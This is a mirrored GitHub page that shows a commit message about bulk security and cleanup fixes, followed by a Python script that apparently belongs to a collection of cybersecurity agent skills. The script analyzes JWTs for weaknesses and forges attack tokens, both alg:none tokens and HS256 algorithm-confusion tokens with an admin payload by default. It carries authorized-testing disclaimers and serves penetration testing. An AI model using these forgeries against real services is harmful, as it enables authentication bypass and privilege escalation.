mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-10 21:24:56 +03:00
c47eed6a64
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
133 lines
4.9 KiB
Python
133 lines
4.9 KiB
Python
#!/usr/bin/env python3
|
|
"""Agent for testing JWT algorithm confusion vulnerabilities."""
|
|
|
|
import argparse
|
|
import base64
|
|
import hashlib
|
|
import hmac
|
|
import json
|
|
from datetime import datetime, timezone
|
|
|
|
|
|
def decode_jwt(token):
    """Decode a JWT's header and payload without verifying the signature.

    Args:
        token: Compact-serialized JWT string (``header.payload.signature``).

    Returns:
        A dict with the keys ``"header"`` and ``"payload"`` (the decoded JSON
        objects) and ``"signature"`` (the third segment, left
        base64url-encoded), or ``None`` when the token does not consist of
        exactly three dot-separated segments, when a segment is not valid
        base64url-encoded JSON, or when the header or payload is not a JSON
        object.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None

    def _decode_segment(segment):
        # JWT segments are written without "=" padding; appending "==" is
        # enough for every valid length because the non-strict decoder
        # tolerates surplus padding.
        return json.loads(base64.urlsafe_b64decode(segment + "=="))

    try:
        header = _decode_segment(parts[0])
        payload = _decode_segment(parts[1])
    except ValueError:
        # binascii.Error, json.JSONDecodeError and UnicodeDecodeError are all
        # ValueError subclasses: any of them means the token is malformed.
        return None

    # Callers use dict methods on both parts, so anything else is malformed.
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return None

    return {"header": header, "payload": payload, "signature": parts[2]}
|
|
|
|
|
|
def forge_none_alg(payload_dict):
    """Build an unsigned JWT whose header declares ``alg: none``.

    Args:
        payload_dict: JSON-serializable claims to embed as the payload.

    Returns:
        The compact token ``<header>.<payload>.`` with an empty signature
        segment; both segments are unpadded base64url-encoded JSON.
    """

    def _b64url_json(obj):
        # Serialize to JSON, base64url-encode, then drop the "=" padding.
        raw = json.dumps(obj).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

    segments = [
        _b64url_json({"alg": "none", "typ": "JWT"}),
        _b64url_json(payload_dict),
        "",  # empty signature segment yields the trailing "."
    ]
    return ".".join(segments)
|
|
|
|
|
|
def forge_hs256_with_public_key(payload_dict, public_key_pem):
    """Forge an HS256 JWT that uses an RSA public key as the HMAC secret.

    Args:
        payload_dict: JSON-serializable claims to embed as the payload.
        public_key_pem: Key material used as the HMAC secret; a ``str`` is
            encoded to bytes, anything else is passed to ``hmac`` as-is.

    Returns:
        The compact token ``<header>.<payload>.<signature>`` where every
        segment is unpadded base64url and the signature is HMAC-SHA256 over
        ``<header>.<payload>``.
    """
    encoded_parts = [
        base64.urlsafe_b64encode(json.dumps(part).encode()).rstrip(b"=").decode()
        for part in ({"alg": "HS256", "typ": "JWT"}, payload_dict)
    ]
    unsigned = ".".join(encoded_parts)

    if isinstance(public_key_pem, str):
        secret = public_key_pem.encode()
    else:
        secret = public_key_pem

    mac = hmac.new(secret, unsigned.encode(), hashlib.sha256)
    tail = base64.urlsafe_b64encode(mac.digest()).rstrip(b"=").decode()
    return f"{unsigned}.{tail}"
|
|
|
|
|
|
def analyze_jwt(token):
    """Inspect a JWT's header and claims for common weaknesses.

    The token is only decoded; its signature is never verified.

    Args:
        token: Compact-serialized JWT string.

    Returns:
        ``{"error": "Invalid JWT format"}`` when the token cannot be decoded
        into a JSON-object header and payload. Otherwise a dict with the keys
        ``"header"``, ``"payload"``, ``"algorithm"`` (the raw ``alg`` header
        value) and ``"findings"`` (a list of ``{"issue", "severity"}`` dicts).
    """
    try:
        decoded = decode_jwt(token)
    except ValueError:
        # Undecodable base64 / JSON surfaces as a ValueError subclass.
        decoded = None
    if not decoded:
        return {"error": "Invalid JWT format"}

    header = decoded["header"]
    payload = decoded["payload"]
    # Both parts come from untrusted JSON and must be objects for .get().
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return {"error": "Invalid JWT format"}

    findings = []

    alg = header.get("alg", "")
    # "alg" may be any JSON value; only a string can spell "none".
    if isinstance(alg, str) and alg.lower() == "none":
        findings.append({"issue": "Algorithm set to 'none'", "severity": "CRITICAL"})

    # Header parameters that are reported whenever they carry a truthy value.
    for name, label, severity in (
        ("jku", "JKU header present", "HIGH"),
        ("x5u", "X5U header present", "HIGH"),
        ("kid", "KID header", "MEDIUM"),
    ):
        if header.get(name):
            findings.append({"issue": f"{label}: {header[name]}", "severity": severity})

    exp = payload.get("exp")
    if exp is None:
        findings.append({"issue": "No expiration claim", "severity": "MEDIUM"})
    elif isinstance(exp, bool) or not isinstance(exp, (int, float)):
        # A present but non-numeric "exp" (bool counts as non-numeric here).
        findings.append({"issue": f"Invalid exp claim: {exp!r}", "severity": "MEDIUM"})
    else:
        try:
            exp_dt = datetime.fromtimestamp(exp, tz=timezone.utc)
        except (ValueError, OverflowError, OSError):
            # Timestamp outside the range the platform can represent (or NaN).
            findings.append({"issue": f"Invalid exp claim: {exp!r}", "severity": "MEDIUM"})
        else:
            # exp == 0 is a real (long expired) timestamp, not a missing claim.
            if exp_dt < datetime.now(timezone.utc):
                findings.append(
                    {"issue": f"Token expired: {exp_dt.isoformat()}", "severity": "LOW"}
                )

    if payload.get("admin") or payload.get("role") in ("admin", "root"):
        findings.append({"issue": "Admin role in payload", "severity": "INFO"})

    return {
        "header": header,
        "payload": payload,
        "algorithm": alg,
        "findings": findings,
    }
|
|
|
|
|
|
def main():
    """Command-line entry point for the JWT algorithm confusion agent.

    Parses the CLI options, optionally analyzes ``--token``, optionally forges
    an ``alg:none`` token (``--forge-none``) and/or an HS256 token keyed with
    the file given by ``--forge-hs256``, and collects everything in a report.
    The report is written to ``--output`` as JSON when given, otherwise it is
    printed to stdout. Invalid ``--payload`` JSON or an unreadable key file
    ends the run through ``parser.error``.
    """
    parser = argparse.ArgumentParser(
        description="Test JWT algorithm confusion vulnerabilities (authorized testing only)"
    )
    parser.add_argument("--token", help="JWT token to analyze")
    parser.add_argument("--forge-none", action="store_true", help="Forge alg:none token")
    parser.add_argument("--forge-hs256", help="Path to RSA public key for alg confusion")
    parser.add_argument("--payload", help="JSON payload for forged token")
    parser.add_argument("--output", "-o", help="Output JSON report")
    args = parser.parse_args()

    print("[*] JWT Algorithm Confusion Testing Agent")
    print("[!] For authorized security testing only")
    report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []}

    if args.token:
        analysis = analyze_jwt(args.token)
        report["findings"].append({"type": "analysis", **analysis})
        if "error" in analysis:
            # Avoid reporting "Algorithm: unknown" for an undecodable token.
            print(f"[!] {analysis['error']}")
        else:
            print(f"[*] Algorithm: {analysis.get('algorithm', 'unknown')}")
            print(f"[*] Issues: {len(analysis.get('findings', []))}")

    if args.payload:
        try:
            payload_dict = json.loads(args.payload)
        except json.JSONDecodeError as exc:
            parser.error(f"--payload is not valid JSON: {exc}")
    else:
        payload_dict = {"sub": "admin", "admin": True}

    if args.forge_none:
        forged = forge_none_alg(payload_dict)
        report["findings"].append({"type": "forge_none", "token": forged})
        print(f"[*] Forged alg:none token: {forged[:60]}...")

    if args.forge_hs256:
        try:
            with open(args.forge_hs256, "r", encoding="utf-8") as f:
                pub_key = f.read()
        except OSError as exc:
            parser.error(f"cannot read public key {args.forge_hs256!r}: {exc}")
        forged = forge_hs256_with_public_key(payload_dict, pub_key)
        # Store the complete token: the report is the only place it is
        # emitted, so a truncated copy would make the forgery unusable.
        report["findings"].append({"type": "forge_hs256_confusion", "token": forged})
        print("[*] Forged HS256 confusion token generated")

    if args.output:
        with open(args.output, "w", encoding="utf-8") as f:
            json.dump(report, f, indent=2)
        print(f"[*] Report saved to {args.output}")
    else:
        print(json.dumps(report, indent=2))
|
|
|
|
|
|
# Run the CLI only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()
|